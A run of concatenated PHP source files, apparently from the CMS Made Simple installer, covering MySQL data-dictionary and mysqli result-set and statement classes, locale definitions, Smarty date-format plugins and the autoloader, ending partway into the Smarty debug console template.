        switch (strtoupper($t)) {
        case 'STRING':
        case 'CHAR':
        case 'VARCHAR':
        case 'TINYBLOB':
        case 'TINYTEXT':
        case 'ENUM':
        case 'SET':
            if ($len <= $this->blobSize) return 'C';

        case 'TEXT':
        case 'LONGTEXT':
        case 'MEDIUMTEXT':
            return 'X';

            // php_mysql extension always returns 'blob' even if 'text'
            // so we have to check whether binary...
        case 'IMAGE':
        case 'LONGBLOB':
        case 'BLOB':
        case 'MEDIUMBLOB':
            return !empty($fieldobj->binary) ? 'B' : 'X';

        case 'YEAR':
        case 'DATE': return 'D';

        case 'TIME':
        case 'DATETIME':
        case 'TIMESTAMP': return 'T';

        case 'INT':
        case 'INTEGER':
        case 'BIGINT':
        case 'TINYINT':
        case 'MEDIUMINT':
        case 'SMALLINT':
            if (!empty($fieldobj->primary_key)) return 'R';
            return 'I';

        default:
            static $typeMap = array(
                'VARCHAR' => 'C',
                'VARCHAR2' => 'C',
                'CHAR' => 'C',
                'C' => 'C',
                'STRING' => 'C',
                'NCHAR' => 'C',
                'NVARCHAR' => 'C',
                'VARYING' => 'C',
                'BPCHAR' => 'C',
                'CHARACTER' => 'C',
                ##
                'LONGCHAR' => 'X',
                'TEXT' => 'X',
                'NTEXT' => 'X',
                'M' => 'X',
                'X' => 'X',
                'CLOB' => 'X',
                'NCLOB' => 'X',
                'LVARCHAR' => 'X',
                ##
                'BLOB' => 'B',
                'IMAGE' => 'B',
                'BINARY' => 'B',
                'VARBINARY' => 'B',
                'LONGBINARY' => 'B',
                'B' => 'B',
                ##
                'YEAR' => 'D', // mysql
                'DATE' => 'D',
                'D' => 'D',
                ##
                'TIME' => 'T',
                'TIMESTAMP' => 'T',
                'DATETIME' => 'T',
                'TIMESTAMPTZ' => 'T',
                'T' => 'T',
                ##
                'BOOL' => 'L',
                'BOOLEAN' => 'L',
                'BIT' => 'L',
                'L' => 'L',
                ##
                'COUNTER' => 'R',
                'R' => 'R',
                'SERIAL' => 'R', // ifx
                'INT IDENTITY' => 'R',
                ##
                'INT' => 'I',
                'INT2' => 'I',
                'INT4' => 'I',
                'INT8' => 'I',
                'INTEGER' => 'I',
                'INTEGER UNSIGNED' => 'I',
                'SHORT' => 'I',
                'TINYINT' => 'I',
                'SMALLINT' => 'I',
                'I' => 'I',
                ##
                'LONG' => 'N', // interbase is numeric, oci8 is blob
                'BIGINT' => 'N', // this is bigger than PHP 32-bit integers
                'DECIMAL' => 'N',
                'DEC' => 'N',
                'REAL' => 'N',
                'DOUBLE' => 'N',
                'DOUBLE PRECISION' => 'N',
                'SMALLFLOAT' => 'N',
                'FLOAT' => 'N',
                'NUMBER' => 'N',
                'NUM' => 'N',
                'NUMERIC' => 'N',
                'MONEY' => 'N',

                ## informix 9.2
                'SQLINT' => 'I',
                'SQLSERIAL' => 'I',
                'SQLSMINT' => 'I',
                'SQLSMFLOAT' => 'N',
                'SQLFLOAT' => 'N',
                'SQLMONEY' => 'N',
                'SQLDECIMAL' => 'N',
                'SQLDATE' => 'D',
                'SQLVCHAR' => 'C',
                'SQLCHAR' => 'C',
                'SQLDTIME' => 'T',
                'SQLINTERVAL' => 'N',
                'SQLBYTES' => 'B',
                'SQLTEXT' => 'X',
                ## informix 10
                "SQLINT8" => 'I8',
                "SQLSERIAL8" => 'I8',
                "SQLNCHAR" => 'C',
                "SQLNVCHAR" => 'C',
                "SQLLVARCHAR" => 'X',
                "SQLBOOL" => 'L'
                );

            $tmap = false;
            $t = strtoupper($t);
            $tmap = (isset($typeMap[$t])) ? $typeMap[$t] : 'N';
            return $tmap;
        }
    }

    public function MetaTables()
    {
        $sql = 'SHOW TABLES';
        $list = $this->connection->GetCol($sql);
        if( count($list) ) return $list;
    }

    public function MetaColumns($table)
    {
        $table = trim($table);
        if( !$table ) throw new \LogicException('empty table name specified for '.__METHOD__);

        $sql = 'SHOW COLUMNS FROM ?';
        $rs = $this->connection->GetArray($sql,$table);
        if( is_array($rs) && count($rs) ) {
            $out = array();
            foreach( $rs as $row ) {
                $out[] = $row['Field'];
            }
            return $out;
        }
    }

    /*
     * Arguably this method is counter-productive. Any correction here will
     * probably not be replicated at runtime, and better to fail during installation.
     * The name is not checked for a reserved-word.
     * Permitted characters in unquoted identifiers are in accord with MySQL documentation.
     */
    protected function NameQuote($name = null, $allowBrackets = false)
    {
        if (!is_string($name)) {
            return '';
        }

        // if name is already quoted, just trim
        if (preg_match('/^\s*`.+`\s*$/', $name)) {
            return trim($name);
        }

        $name = rtrim($name);
        // if name contains special characters, quote it
        $patn = ($allowBrackets) ? '\w$()\x80-\xff' : '\w$\x80-\xff';
        if (preg_match('/[^'.$patn.']/', $name)) {
            return '`'.$name.'`';
        }
        // if name contains only digits, quote it
        if (preg_match('/^\s*\d+$/', $name)) {
            return '`'.$name.'`';
        }
        return $name;
    }

    protected function _CreateSuffix($fname,$ftype,$fnotnull,$fdefault,$fautoinc,$fconstraint,$funsigned)
    {
        $suffix = '';
        if ($funsigned) $suffix .= ' UNSIGNED';
        if ($fnotnull) $suffix .= ' NOT NULL';
        if (strlen($fdefault)) $suffix .= " DEFAULT $fdefault";
        if ($fautoinc) $suffix .= ' AUTO_INCREMENT';
        if ($fconstraint) $suffix .= ' '.$fconstraint;
        return $suffix;
    }

    function _ProcessOptions($opts)
    {
        // fixes for old TYPE= stuff in tabopts.
        if( is_array($opts) && count($opts) ) {
            foreach( $opts as $key => &$val ) {
                if( startswith(strtolower($key),'mysql') ) {
                    $val = preg_replace('/TYPE\s?=/i','ENGINE=',$val);
                }
            }
        }
        return $opts;
    }

    function _IndexSQL($idxname, $tabname, $flds, $idxoptions)
    {
        $sql = array();

        if ( isset($idxoptions['REPLACE']) || isset($idxoptions['DROP']) ) {
            if ($this->alterTableAddIndex) $sql[] = "ALTER TABLE $tabname DROP INDEX $idxname";
            else $sql[] = sprintf($this->dropIndex, $idxname, $tabname);

            if ( isset($idxoptions['DROP']) ) return $sql;
        }

        if ( empty ($flds) ) return $sql;

        if (isset($idxoptions['FULLTEXT'])) {
            $unique = ' FULLTEXT';
        } elseif (isset($idxoptions['UNIQUE'])) {
            $unique = ' UNIQUE';
        } else {
            $unique = '';
        }

        if ( is_array($flds) ) $flds = implode(', ',$flds);

        if ($this->alterTableAddIndex) $s = "ALTER TABLE $tabname ADD $unique INDEX $idxname ";
        else $s = 'CREATE' . $unique . ' INDEX ' . $idxname . ' ON ' . $tabname;

        $s .= ' (' . $flds . ')';

        if( ($opts = $this->get_dbtype_options($idxoptions)) ) $s .= $opts;

        $sql[] = $s;

        return $sql;
    }

    function CreateTableSQL($tabname, $flds, $tableoptions=false)
    {
        $str = 'ENGINE=MyISAM CHARACTER SET utf8 COLLATE utf8_general_ci';
        $dbtype = $this->_DBType();

        // clean up input tableoptions
        if( !$tableoptions ) {
            $tableoptions = [ $dbtype => $str ];
        }
        else if( is_string($tableoptions) ) {
            $tableoptions = [ $dbtype => $tableoptions ];
        }
        else if( is_array($tableoptions) && !isset($tableoptions[$dbtype]) && isset($tableoptions['mysql']) ) {
            $tableoptions[$dbtype] = $tableoptions['mysql'];
        }
        else if( is_array($tableoptions) && !isset($tableoptions[$dbtype]) && isset($tableoptions['MYSQL']) ) {
            $tableoptions[$dbtype] = $tableoptions['MYSQL'];
        }

        foreach( $tableoptions as $key => &$val ) {
            if( strpos($val,'TYPE=') !== FALSE ) $val = str_replace('TYPE=','ENGINE=',$val);
        }
        if( isset($tableoptions[$dbtype]) && strpos($tableoptions[$dbtype],'CHARACTER') === FALSE &&
            strpos($tableoptions[$dbtype],'COLLATE') === FALSE ) {
            // if no character set and collate options specified, force UTF8
            $tableoptions[$dbtype] .= " CHARACTER SET utf8 COLLATE utf8_general_ci";
        }

        return parent::CreateTableSQL($tabname, $flds, $tableoptions);
    }

} // end of class
<?php

namespace CMSMS\Database\mysqli;

class ResultSet extends \CMSMS\Database\ResultSet
{
    private $_connection;
    private $_resultId;
    private $_fields;
    private $_nrows;
    private $_pos;
    private $_sql;
    private $resultId;

    public function __construct(\mysqli $conn, $resultId, $sql = null)
    {
        $this->_connection = $conn;
        $this->_resultId = $resultId;
        $this->_pos = 0;
        $this->_nrows = 0;
        $this->_sql = $sql;
        if( is_object($resultId) ) $this->_nrows = mysqli_num_rows( $resultId );
        if( !$this->EOF() ) $this->fetch_row();
    }

    public function __destruct()
    {
        if( $this->resultId ) mysqli_free_result( $this->resultId );
    }

    public function Close()
    {
        if( $this->resultId ) mysqli_free_result( $this->resultId );
        $this->_fields = $this->resultId = null;
    }

    public function Fields( $key = null )
    {
        $key = (string) $key;
        if( empty($key) ) return $this->_fields;
        return $this->fields[$key];
    }

    public function RecordCount()
    {
        return $this->_nrows;
    }

    public function EOF()
    {
        return ($this->_nrows == 0 || $this->_pos < 0 || $this->_pos >= $this->_nrows);
    }

    protected function Move($idx)
    {
        if( $idx == $this->_pos ) return TRUE;
        if( $idx >= 0 && $idx < $this->_nrows ) {
            if( mysqli_data_seek($this->_resultId, $idx) ) {
                $this->_pos = $idx;
                $this->fetch_row();
                return TRUE;
            }
        }
        $this->_pos = $this->_nrows;
        return FALSE;
    }

    public function MoveFirst()
    {
        if( $this->_pos == 0 ) return TRUE;
        return $this->Move(0);
    }

    public function MoveNext()
    {
        return $this->Move($this->_pos+1);
    }

    protected function fetch_row()
    {
        if( !$this->EOF() ) $this->_fields = mysqli_fetch_array($this->_resultId, MYSQLI_ASSOC);
    }

} // end of class
<?php

namespace CMSMS\Database\mysqli;

class Statement extends \CMSMS\Database\Statement
{
    private $_data;

    // meta...
    private $_bind;
    private $_bound;
    private $_types;
    private $_stmt; // the statement object.
    private $_meta; // after first execute
    private $_num_rows; // after first execute
    private $_row; // updates after each execute for queries with a resultset
    private $_pos; // updates after each execute for queries with a resultset

    public function __construct(Connection $conn,$sql = null)
    {
        // this is just for type checking.
        parent::__construct($conn,$sql);
    }

    public function __destruct()
    {
        if( $this->_stmt ) {
            $this->_stmt->free_result();
            $this->_stmt->close();
        }
    }

    protected function get_type_char($var)
    {
        $t = gettype($var);
        switch( $t ) {
        case 'double':
            return 'd';
        case 'boolean':
        case 'integer':
            return 'i';
        case 'string':
        default:
            return 's';
        }
    }

    protected function set_bound_data($data)
    {
        $this->_data = $data;
        reset($this->_data);
    }

    protected function bind_params()
    {
        if( !$this->_stmt ) $this->prepare($this->sql);

        // get the type string
        $this->_types = '';
        $keys = null;
        $args = func_get_args();
        if( count($args) == 1 && is_array($args) && is_array($args[0]) ) {
            // we expect that the data is an associtive array
            $row = $args[0];
            foreach( $row as $key => $val ) {
            	$this->_types .= $this->get_type_char($val);
            }
            $this->_bind = array_values($row);
            $keys = array_keys($row);
        } else {
            // function called with numerous parameters... get their types
            $keys = array_keys($args);
            foreach( $args as $val ) {
                $this->_types .= $this->get_type_char($val);
            }
            $this->_bind = array_values($args);
        }

        $this->_bound = array();
        $this->_bound[] =& $this->_types;
        for( $i = 0; $i < count($keys); $i++ ) {
            $this->_bound[] =& $this->_bind[$i];
        }
        call_user_func_array(array($this->_stmt,'bind_param'),$this->_bound);
    }

    protected function prepare($sql)
    {
        $conn = $this->db->get_inner_mysql();
        if( !$conn || !$this->db->IsConnected() ) throw new \LogicException('Attempt to create prepared statement when database is not connected');
        $this->_stmt = $conn->prepare( (string) $sql );
	if( !$this->_stmt ) throw new \LogicException('Could not prepare a statement: '.$conn->error);
        $this->_row = null;
        $this->_pos = 0;
    }

    public function Bind(array $data)
    {
        parent::Bind($data);
        $first = $data[0];
        $this->bind_params($first);
    }

    public function EOF()
    {
        if( $this->_meta ) return ($this->_pos >= $this->_num_rows);
        if( !$this->_data ) return TRUE;
        return (current($this->_data) === FALSE);
    }

    public function MoveFirst()
    {
        if( $this->_meta ) $this->_stmt->data_seek(0);
        if( $this->_data ) reset($this->_data);
    }

    public function MoveNext()
    {
        if( $this->_meta ) $this->_pos = $this->_pos + 1;
        if( $this->_data ) next($this->_data);
    }

    public function Fields($col = null)
    {
        $row = null;
        if( $this->_stmt ) {
            $this->_stmt->fetch();
            $row = $this->_row;
        }
        if( !$row && $this->_data ) $row = current($this->_data);
        if( !$row ) return; // nothing

        if( $col ) {
            if( isset($row[$col]) ) return $row[$col];
        } else {
            return $row;
        }
    }

    public function Execute()
    {
        if( !$this->_stmt ) $this->prepare($this->_sql);
        $args = func_get_args();
        if( count($args) == 1 && is_array($args) && is_array($args[0]) ) $args = $args[0];

        /* if we have param count, find some arguments... either via the execute method... or via bound params */
        $pc = $this->_stmt->param_count;
        $fc = $this->_stmt->field_count;
        if( $args ) {
            $this->_data = $args;
            $this->bind_params($args);
        }
        if( $pc ) {
            // we are expecting paramers
            if( !count($args) ) {
                // get the arguments via the bound data current row.
                if( !$this->_bind ) throw new \LogicException('No bound parameters, and no arguments passed');
                if( count($this->_bind) != $pc ) throw new \LogicException('Incorrect number of bound parameters.  Expecting '.$this->_stmt->field_count);
                $args = $this->Fields();
            }
        }
        if( $pc != count($args) ) throw new \LogicException('Incorrect number of arguments. Expecting '.$pc);

        if( $args ) {
            // update bound values
            $keys = array_keys($args);
            for( $i = 0; $i < count($this->_bind); $i++ ) {
                $this->_bind[$i] = $args[$keys[$i]];
            }
        }

        $res = $this->_stmt->execute();
        if( !$res ) die('ERROR: '.$this->_stmt->error."\n");

        $this->_stmt->store_result();

        $meta = $this->_stmt->result_metadata();
        if( !$this->_meta && $meta ) {
            $this->_num_rows = $this->_stmt->num_rows;
            $this->_meta = $meta;
            $this->_row = array();
            while( $field = $this->_meta->fetch_field() ) {
                $this->_row[$field->name] = null;
                $params[] =& $this->_row[$field->name];
            }
            call_user_func_array(array($this->_stmt,'bind_result'),$params);
        }
    }
}
<?php

namespace __appbase;

final class de_DE_nls extends nls
{
  public function __construct()
  {
    $this->_fullname = 'German';
    $this->_display = 'Deutsch';
    $this->_isocode = 'de';
    $this->_locale = 'de_DE';
    $this->_encoding = 'UTF-8';
    $this->_aliases = 'german,de_DE.ISO8859-1';
  }

  
} // end of class

?><?php

namespace __appbase;

class en_US_nls extends nls
{
  public function __construct()
  {
    $this->_fullname = 'English';
	
    $this->_isocode = 'en';
    $this->_locale = 'en_US';
    $this->_encoding = 'UTF-8';
    $this->_aliases = 'english,eng,en_CA,en_GB,en_US.ISO8859-1';
  }  

  public function foo() { return 1; }
} // end of class

?><?php

namespace __appbase;

final class fr_FR_nls extends nls
{
  public function __construct()
  {
    $this->_fullname = 'French';
    $this->_display = 'Fran&#231;ais';
    $this->_isocode = 'fr';
    $this->_locale = 'fr_FR';
    $this->_encoding = 'UTF-8';
    $this->_aliases = 'french,fre,fr_BE,fr_CA,fr_LU,fr_CH,fr_FR.ISO8859-1';
  }  
  
  
} // end of class

?><?php

namespace __appbase;

final class nb_NO_nls extends nls
{
  public function __construct()
  {
    $this->_fullname = 'Norwegian bokmål';
    $this->_display = 'Norsk bokmål';
    $this->_isocode = 'nb';
    $this->_locale = 'nb_NO';
    $this->_encoding = 'UTF-8';
    $this->_aliases = 'nb_NO.utf8,nb_NO.utf-8,nb_NO.UTF-8,nb_NO,nb_NO.ISO8859-1,nb_NO.ISO8859-15,norwegian,Norwegian_Norway.1252';
  }  
  
  
} // end of class

?>
<?php

namespace __appbase;

final class nl_NL_nls extends nls
{
  public function __construct()
  {
    $this->_fullname = 'Dutch';
    $this->_display = 'Nederlands';
    $this->_isocode = 'nl';
    $this->_locale = 'nl_NL';
    $this->_encoding = 'UTF-8';
    $this->_aliases = 'dutch,nl_NL.ISO8859-1';
  }  
  
  
} // end of class

?><?php

namespace __appbase;

final class pt_PT_nls extends nls
{
  public function __construct()
  {
    $this->_fullname = 'Portuguese';
    $this->_display = 'Portugu&ecirc;s';
    $this->_isocode = 'pt';
    $this->_locale = 'pt_PT';
    $this->_encoding = 'UTF-8';
    $this->_aliases = 'portugguese,pt_PT.ISO8859-1';
  }  
  
  
} // end of class

?>
<?php

namespace __appbase;

final class ru_RU_nls extends nls
{
  public function __construct()
  {
    $this->_fullname = 'Русский';
    $this->_isocode = 'ru';
    $this->_locale = 'ru_RU';
    $this->_encoding = 'UTF-8';
    $this->_aliases = 'russian,ru,ru_RU,ru_RU.ISO3166-2';
  }  
   
} // end of class

?><?php
/**
 * Smarty plugin
 * Type:     modifier<br>
 * Name:     cms_date_format<br>
 * Purpose:  format datestamps via strftime<br>
 * Input:<br>
 *          - string: input date string
 *          - format: strftime format for output
 *          - default_date: default date if $string is empty
 *
 * @link   http://www.smarty.net/manual/en/language.modifier.date.format.php date_format (Smarty online manual)
 * @author Monte Ohrt <monte at ohrt dot com>
 *
 * @param string $string       input date string
 * @param null   $format       strftime format for output
 * @param string $default_date default date if $string is empty
 *
 * @return string |void
 * @uses   smarty_make_timestamp()
 *
 * Modified by JoMorg to use our version of deprecated strftime
 */
function smarty_modifier_cms_date_format($string, $format = NULL, $default_date = '', $formatter = 'auto')
{
	if ($format === null)
	{
		$format = Smarty::$_DATE_FORMAT;
	}
	
	/**
	 * require_once the {@link shared.make_timestamp.php} plugin
	 */
	static $is_loaded = FALSE;
	if(!$is_loaded)
	{
		if(!is_callable('smarty_make_timestamp'))
		{
			include_once SMARTY_PLUGINS_DIR . 'shared.make_timestamp.php';
		}
		$is_loaded = TRUE;
	}
	if(!empty($string) && '0000-00-00' !== $string && '0000-00-00 00:00:00' !== $string)
	{
		$timestamp = smarty_make_timestamp($string);
	}
	else if(!empty($default_date))
	{
		$timestamp = smarty_make_timestamp($default_date);
	}
	else
	{
		return;
	}
	if('strftime' === $formatter || ('auto' === $formatter && FALSE !== strpos($format, '%')))
	{
		if(Smarty::$_IS_WINDOWS)
		{
			$_win_from = [
				'%D',
				'%h',
				'%n',
				'%r',
				'%R',
				'%t',
				'%T'
			];
			$_win_to   = [
				'%m/%d/%y',
				'%b',
				"\n",
				'%I:%M:%S %p',
				'%H:%M',
				"\t",
				'%H:%M:%S'
			];
			if(FALSE !== strpos($format, '%e'))
			{
				$_win_from[] = '%e';
				$_win_to[]   = sprintf('%\' 2d', date('j', $timestamp));
			}
			if(FALSE !== strpos($format, '%l'))
			{
				$_win_from[] = '%l';
				$_win_to[]   = sprintf('%\' 2d', date('h', $timestamp));
			}
			$format = str_replace($_win_from, $_win_to, $format);
		}
		
		return \cms_autoinstaller\utils::strftime($format, $timestamp);
	}
	
	return date($format, $timestamp);
}

// EOF
?>
<?php
/**
 * Smarty plugin
 * Type:     modifier
 * Name:     localedate_format
 * Purpose:  format date/time values
 *
 * @param mixed $datevar      input date-time string | timestamp | DateTime object
 * @param string $format      optional strftime() and/or date()-compatible format for output. Default '%b %e, %Y'
 * @param mixed $default_date optional date-time to use if $datevar is empty. Default ''
 *
 * @return string
 */

function smarty_modifier_localedate_format($datevar, $format = '%b %e, %Y', $default_date = '')
{
    if (empty($datevar)) {
        $datevar = $default_date;
    }
    if (empty($datevar)) {
        $st = time();
    } elseif (is_numeric($datevar)) {
        $st = (int)$datevar;
    } elseif ($datevar instanceof DateTime
      || (interface_exists('DateTimeInterface', false) && $datevar instanceof DateTimeInterface)
    ) {
        $st = $datevar->format('U');
    } else {
        $st = strtotime($datevar);
        if ($st === -1 || $st === false) {
            $st = time();
        }
    }

    $outfmt = localedate_adjust($format);
    $tmp = date($outfmt, $st);
    $text = preg_replace_callback_array(array(
        '~[\x01-\x08\x0e\x0f]~' => function($m) use($st) {
            return localedate_ise ($st, $m[0]);
        },
        '~\x11~' => function($m) use($st) { // two-digit century
            return floor(date('Y', $st) / 100);
        },
        '~\x12~' => function($m) use($st) { // week of year, per ISO8601
            return substr(date('o', $st), -2);
        },
        '~\x10~' => function($m) use($st) { // week of year, assuming the first Monday is day 0
             $n1 = date('Y', $st);
             $n2 = date('z', strtotime('first monday of january '.$n1));
             $n1 = date('z', $st);
             return floor(($n2-$n1) / 7) + 1;
         },
        '~\x13~' => function($m) use($st) { // week of year, assuming the first Sunday is day 0
            $n1 = date('Y', $st);
            $n2 = date('z', strtotime('first sunday of january '.$n1));
            $n1 = date('z', $st);
            return floor(($n2-$n1) / 7) + 1;
        }
    ), $tmp);

    return $text;
}

function localedate_adjust($fmt)
{
    if (!$fmt) {
        return $fmt;
    }
    $from = array(
    '%a', // \1
    '%A', // \2
    '%d',
    '%e',
    '%j',
    '%u',
    '%w',
    '%W', // \10
    '%b', // \3
    '%h', // \3
    '%B', // \4
    '%m',
    '%y',
    '%Y',
    '%D',
    '%F',
    '%x', // \6
    '%H',
    '%k',
    '%I',
    '%l',
    '%M',
    '%p', // \0e
    '%P', // \0f
    '%r',
    '%R',
    '%S',
    '%T',
    '%X', // \7
    '%z',
    '%Z',
    '%c', // \8
    '%s',
    '%n',
    '%t',
    '%%',
    '%C', // \11
    '%g', // \12
    '%G',
    '%U', // \13
    '%V',
    );

    $to = array(
    "\1",
    "\2",
    'd',
    'j', // interim
    'z',
    'N',
    'w',
    "\x10",
    "\3",
    "\3",
    "\4",
    'm',
    'y',
    'Y',
    'm/d/y',
    'Y-m-d',
    "\6",
    'H',
    'G',
    'h',
    'g',
    'i',
    "\x0e",
    "\x0f",
    'h:i:s A',
    'H:i',
    's',
    'H:i:s',
    "\7",
    'O',
    'T',
    "\x8",
    'U',
    "\n",
    "\t",
    '&#37;', // '%' chars are valid but may confuse e.g. Smarty date-munger
    "\x11",
    "\x12",
    'o',
    "\x13",
    'W',
    );
    if (strncasecmp(PHP_OS, 'WIN', 3) === 0) {
// TODO robustly derive values for Windows OS
/* see
https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/strftime-wcsftime-strftime-l-wcsftime-l?redirectedfrom=MSDN&view=msvc-170
re other uses of '#' modifier
*/
        $to[3] = '#d'; // per php.net: correctly relace %e on Windows
    }
    return str_replace($from, $to, $fmt);
}

function localedate_ise ($st, $mode)
{
    if (extension_loaded('Intl')) {
        $dt = new DateTime();
        $dt->setTimestamp($st);
        $locale = \__appbase\translator()->get_selected_language();

        switch ($mode) {
        case "\1": // short day name
            return datefmt_format_object($dt, 'EEE', $locale);
        case "\2": // normal day name
            return datefmt_format_object($dt, 'EEEE', $locale);
        case "\3": // short month name
            return datefmt_format_object($dt, 'MMM', $locale);
        case "\4": // normal month name
            return datefmt_format_object($dt, 'MMMM', $locale);
        case "\6": // date only
            return datefmt_format_object($dt,
                array(IntlDateFormatter::FULL, IntlDateFormatter::NONE), $locale);
        case "\7": // time only
            return datefmt_format_object($dt,
                array(IntlDateFormatter::NONE, IntlDateFormatter::MEDIUM), $locale);
        case "\x8": // date and time
            return datefmt_format_object($dt,
                array(IntlDateFormatter::FULL, IntlDateFormatter::MEDIUM), $locale);
        case "\x0e": // am/pm, upper-case
        case "\x0f": // am/pm, lower-case
            $s = datefmt_format_object($dt, 'a', $locale);
            if ($mode == "\x0e") {
                // force upper-case, any charset
                if (!preg_match('/[\x80-\xff]/',$s)) { return strtoupper($s); }
                elseif (function_exists('mb_strtoupper')) { return mb_strtoupper($s); }
            } else {
                // force lower-case, any charset
                if (!preg_match('/[\x80-\xff]/',$s)) { return strtolower($s); }
                elseif (function_exists('mb_strtolower')) { return mb_strtolower($s); }
            }
            return $s;
        default:
            return 'Unknown Format';
        }
    } elseif (function_exists('nl_langinfo')) { // not Windows OS
        switch ($mode) {
        case "\1": // short day name
            $n = date('w', $st) + 1;
            $fmt = constant('ABDAY_'.$n);
            return nl_langinfo($fmt);
        case "\2": // normal day name
            $n = date('w', $st) + 1;
            $fmt = constant('DAY_'.$n);
            return nl_langinfo($fmt);
        case "\3": // short month name
            $n = date('n', $st);
            $fmt = constant('ABMON_'.$n);
            return nl_langinfo($fmt);
        case "\4": // normal month name
            $n = date('n', $st);
            $fmt = constant('MON_'.$n);
            return nl_langinfo($fmt);
        case "\6": // date without time
            $fmt = nl_langinfo(D_FMT);
            $fmt = localedate_adjust($fmt);
            return date($fmt);
        case "\7": // time without date
            $fmt = nl_langinfo(T_FMT);
            $fmt = localedate_adjust($fmt);
            return date($fmt);
        case "\x8": // date and time
            $fmt = nl_langinfo(D_T_FMT);
            $fmt = localedate_adjust($fmt);
            return date($fmt);
        case "\x0e": // am/pm, upper-case
        case "\x0f": // am/pm, lower-case
            $s = date('A', $st);
            $fmt = ($s == 'AM') ? AM_STR : PM_STR;
            $s = nl_langinfo($fmt);
            if ($mode == "\x0e") {
                // force upper-case, any charset
                if (!preg_match('/[\x80-\xff]/',$s)) { return strtoupper($s); }
                elseif (function_exists('mb_strtoupper')) { return mb_strtoupper($s); }
            } else {
                // force lower-case, any charset
                if (!preg_match('/[\x80-\xff]/',$s)) { return strtolower($s); }
                elseif (function_exists('mb_strtolower')) { return mb_strtolower($s); }
            }
            return $s;
        default:
            return 'Unknown Format';
        }
    } else {
// TODO robustly derive values for Windows OS
        switch ($mode) {
        case "\1": // short day name
            return date('D', $st);
        case "\2": // normal day name
            return date('l', $st);
        case "\3": // short month name
            return date('M', $st);
        case "\4": // normal month name
            return date('F', $st);
        case "\6": // date only
            return date('j F Y', $st);
        case "\7": // time only
            return date('H:i:s', $st);
        case "\x8": // date and time
            return date('j F Y h:i a', $st);
        case "\x0e": // am/pm, upper-case
            return date('A', $st);
        case "\x0f": // am/pm, lower-case
            return date('a', $st);
        default:
            return 'Unknown Format';
        }
    }
}

function smarty_cms_help_modifier_localedate_format()
{
    echo <<<EOS
<p>Replacement for Smarty modifier date_format. This does not use deprecated strftime() to process the format</p>
<pre>{\$datetimevar|localedate_format[:&apos;optional params&apos;]}</pre>
<p>Parameters</p>
<ul>
<li>(<em>optional</em>)string PHP date()- and/or strftime()-compatible format specifier. Default &apos;%b %e, %Y&apos;</li>
<li>(<em>optional</em>)stamp|string|DateTime object default datetime specifier to use if necessary</li>
</ul>
EOS;
}

function smarty_cms_about_modifier_localedate_format()
{
    echo <<<EOS
<p>Change History:</p>
<ul>
 <li>None</li>
</ul>
EOS;
}
<?php
/**
 * Smarty Autoloader
 *
 * @package Smarty
 */


if (!defined('SMARTY_HELPER_FUNCTIONS_LOADED')) {
	include __DIR__ . '/functions.php';
}

/**
 * Smarty Autoloader
 *
 * @package Smarty
 * @author  Uwe Tews
 *             Usage:
 *                  require_once '...path/Autoloader.php';
 *                  Smarty_Autoloader::register();
 *             or
 *                  include '...path/bootstrap.php';
 *
 *                  $smarty = new Smarty();
 */
class Smarty_Autoloader
{
    /**
     * Filepath to Smarty root
     *
     * @var string
     */
    public static $SMARTY_DIR = null;

    /**
     * Filepath to Smarty internal plugins
     *
     * @var string
     */
    public static $SMARTY_SYSPLUGINS_DIR = null;

    /**
     * Array with Smarty core classes and their filename
     *
     * @var array
     */
    public static $rootClasses = array('smarty' => 'Smarty.class.php');

    /**
     * Registers Smarty_Autoloader backward compatible to older installations.
     *
     * @param bool $prepend Whether to prepend the autoloader or not.
     */
    public static function registerBC($prepend = false)
    {
        /**
         * register the class autoloader
         */
        if (!defined('SMARTY_SPL_AUTOLOAD')) {
            define('SMARTY_SPL_AUTOLOAD', 0);
        }
        if (SMARTY_SPL_AUTOLOAD
            && set_include_path(get_include_path() . PATH_SEPARATOR . SMARTY_SYSPLUGINS_DIR) !== false
        ) {
            $registeredAutoLoadFunctions = spl_autoload_functions();
            if (!isset($registeredAutoLoadFunctions[ 'spl_autoload' ])) {
                spl_autoload_register();
            }
        } else {
            self::register($prepend);
        }
    }

    /**
     * Registers Smarty_Autoloader as an SPL autoloader.
     *
     * @param bool $prepend Whether to prepend the autoloader or not.
     */
    public static function register($prepend = false)
    {
        self::$SMARTY_DIR = defined('SMARTY_DIR') ? SMARTY_DIR : __DIR__ . DIRECTORY_SEPARATOR;
        self::$SMARTY_SYSPLUGINS_DIR = defined('SMARTY_SYSPLUGINS_DIR') ? SMARTY_SYSPLUGINS_DIR :
            self::$SMARTY_DIR . 'sysplugins' . DIRECTORY_SEPARATOR;
        spl_autoload_register(array(__CLASS__, 'autoload'), true, $prepend);
    }

    /**
     * Handles auto loading of classes.
     *
     * @param string $class A class name.
     */
    public static function autoload($class)
    {
        if ($class[ 0 ] !== 'S' || strpos($class, 'Smarty') !== 0) {
            return;
        }
        $_class = smarty_strtolower_ascii($class);
        if (isset(self::$rootClasses[ $_class ])) {
            $file = self::$SMARTY_DIR . self::$rootClasses[ $_class ];
            if (is_file($file)) {
                include $file;
            }
        } else {
            $file = self::$SMARTY_SYSPLUGINS_DIR . $_class . '.php';
            if (is_file($file)) {
                include $file;
            }
        }
        return;
    }
}
<?php
/**
 * This file is part of the Smarty package.
 *
 * (c) Sebastian Bergmann <sebastian@phpunit.de>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */
/**
 * Load and register Smarty Autoloader
 */
if (!class_exists('Smarty_Autoloader')) {
    include __DIR__ . '/Autoloader.php';
}
Smarty_Autoloader::register(true);
{capture name='_smarty_debug' assign=debug_output}
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <title>Smarty Debug Console</title>
        <style>
            {literal}
            body, h1, h2, h3, td, th, p {
                font-family: sans-serif;
                font-weight: normal;
                font-size: 0.9em;
                margin: 1px;
                padding: 0;
            }

            h1 {
                margin: 0;
                text-align: left;
                padding: 2px;
                background-color: #f0c040;
                color: black;
                font-weight: bold;
                font-size: 1.2em;
            }

            h2 {
                background-color: #9B410E;
                color: white;
                text-align: left;
                font-weight: bold;
                padding: 2px;
                border-top: 1px solid black;
            }

            h3 {
                text-align: left;
                font-weight: bold;
                color: black;
                font-size: 0.7em;
                padding: 2px;
            }

            body {
                background: black;
            }

            p, table, div {
                background: #f0ead8;
            }

            p {
                margin: 0;
                font-style: italic;
                text-align: center;
            }

            table {
                width: 100%;
            }

            th, td {
                font-family: monospace;
                vertical-align: top;
                text-align: left;
            }

            td {
                color: green;
            }

            tr:nth-child(odd) {
                background-color: #eeeeee;
            }

